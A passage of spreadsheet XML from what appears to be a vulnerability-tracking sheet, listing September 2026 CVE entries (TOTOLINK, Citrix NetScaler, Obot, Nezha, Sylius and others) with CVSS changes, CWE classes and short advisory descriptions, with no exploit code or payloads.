      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="inlineStr"/>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S422" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in TOTOLINK N150RT 3.4.0-B20201030. The affected element is the function system of the file /boafrm/formWlSiteSurvey of the component Web Management Interface. This manipulation of the argument wlanif causes os command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="T422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100896</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.4)</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101060</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="inlineStr"/>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S423" s="5" t="inlineStr">
        <is>
          <t>python-utcp versions before 1.1.4 contain a server-side request forgery vulnerability in HttpCommunicationProtocol.call_tool that validates the initial tool URL but follows HTTP redirects without re-validating the target. Attackers controlling a tool endpoint can return a 302 redirect to internal services, allowing the UTCP client to reach cloud metadata endpoints or internal HTTP services and return their response bodies to the caller.</t>
        </is>
      </c>
      <c r="T423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101060</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 8.3)</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101049</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="inlineStr"/>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S424" s="5" t="inlineStr">
        <is>
          <t>Heym before 0.0.53 fails to verify Slack request signatures when trigger nodes lack credential IDs or have empty signing secrets. Remote unauthenticated attackers can send forged Slack events to known webhook URLs to trigger workflows with the owner's credentials.</t>
        </is>
      </c>
      <c r="T424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101049</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 8.3)</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101050</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="inlineStr"/>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S425" s="5" t="inlineStr">
        <is>
          <t>Heym before 0.0.53 fails to verify the X-Telegram-Bot-Api-Secret-Token header on Telegram webhook endpoints when credential_id is absent or secret_token is empty. Remote unauthenticated attackers can post forged Telegram updates to trigger workflows with the owner's configured credentials and execute actions on attacker-supplied input.</t>
        </is>
      </c>
      <c r="T425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101050</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.6 → 8.3)</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101064</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M426" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S426" s="5" t="inlineStr">
        <is>
          <t>Obot before v0.23.0 contains a server-side request forgery vulnerability in remote MCP server registration that allows privileged users to specify arbitrary URLs without destination validation. Attackers with Power User or higher roles can coerce Obot to make requests to internal services and cloud metadata endpoints, reading responses in error messages to disclose sensitive credentials.</t>
        </is>
      </c>
      <c r="T426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101064</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.9 → 8.2)</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100869</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S427" s="5" t="inlineStr">
        <is>
          <t>Sylius versions before 2.1.16 and 2.2.9 fail to restrict payment request actions in the Shop API endpoint, allowing customers to trigger refunds on completed orders. Attackers with order tokens can submit arbitrary payment actions like refunds that payment gateways execute while Sylius maintains order as paid, causing financial loss.</t>
        </is>
      </c>
      <c r="T427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100869</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 7.7)</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100908</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S428" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Eyeplus 57.0.0.0308. This affects an unknown function of the component p2pcam HTTP Parser. Such manipulation leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="T428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100908</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 7.5)</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88778</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="inlineStr"/>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K429" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>CWE-342</t>
        </is>
      </c>
      <c r="S429" s="5" t="inlineStr">
        <is>
          <t>Predictable exact value from previous values vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23.</t>
        </is>
      </c>
      <c r="T429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88778</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.0 → 7.3)</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101032</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="inlineStr"/>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S430" s="5" t="inlineStr">
        <is>
          <t>navi through 2.24.0 fails to properly escape cheatsheet variable values when substituting them into shell commands. Attackers can inject shell metacharacters through crafted file names in suggestion command directories to execute arbitrary commands with victim privileges.</t>
        </is>
      </c>
      <c r="T430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101032</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.0 → 7.2)</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88774</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="inlineStr"/>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K431" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr"/>
      <c r="S431" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to a feature policy bypass due to improper HTTP URL based expression usage.</t>
        </is>
      </c>
      <c r="T431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88774</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS vector changed</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101059</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="inlineStr"/>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S432" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">utcp-http </t>
        </is>
      </c>
      <c r="T432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101059</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 7.1)</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101085</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="inlineStr"/>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="S433" s="5" t="inlineStr">
        <is>
          <t>Nezha before 2.3.8 fails to validate alert rule type and duration bounds, allowing authenticated non-administrator users to create malformed rules that trigger unrecovered panics in the alert evaluator goroutine. Attackers can submit a crafted alert rule via the POST /api/v1/alert-rule endpoint to crash the dashboard process, which persists the rule and causes repeated crashes on restart, disabling all monitoring and control plane functionality.</t>
        </is>
      </c>
      <c r="T433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101085</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 7.1)</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101086</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="inlineStr"/>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S434" s="5" t="inlineStr">
        <is>
          <t>Nezha Dashboard versions before 2.3.5 fail to restrict service monitor task types to supported probe types, allowing authenticated users with nezha:service:write scope to submit privileged task types through the service API. Attackers can deliver command execution or Agent configuration tasks to Agents within their authorization scope by exploiting the shared protobuf Task.Type namespace between service monitors and privileged operations.</t>
        </is>
      </c>
      <c r="T434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101086</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 6.9)</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101056</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="inlineStr"/>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q435" s="5" t="inlineStr"/>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S435" s="5" t="inlineStr">
        <is>
          <t>Cloudreve before 4.16.1 fails to revalidate share access when restoring cached navigator state from a context_hint UUID. Attackers who previously had valid share access can replay the cached hint to generate signed file URLs for up to 300 seconds after the share is deleted, expires, or reaches zero remaining downloads.</t>
        </is>
      </c>
      <c r="T435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101056</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 6.9)</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101063</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="inlineStr"/>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M436" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S436" s="5" t="inlineStr">
        <is>
          <t>Obot versions before v0.23.0 fail to enforce authentication on MCP Registry endpoints under /v0.1/* when registry authentication is enabled. Unauthenticated attackers can read registry metadata including server names, descriptions, repository URLs, and connect URLs by sending GET requests to /v0.1/servers.</t>
        </is>
      </c>
      <c r="T436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101063</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.5 → 5.7)</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100902</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="inlineStr"/>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-20</t>
        </is>
      </c>
      <c r="S437" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Barco ClickShare CX-20 Gen2 up to 02.26.00.0007. Affected by this issue is some unknown functionality of the file /wallpaper of the component Wallpaper Upload. This manipulation of the argument wallpaper causes improper validation of syntactic correctness of input. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T437" s="6" t="inlineStr">
        <is>
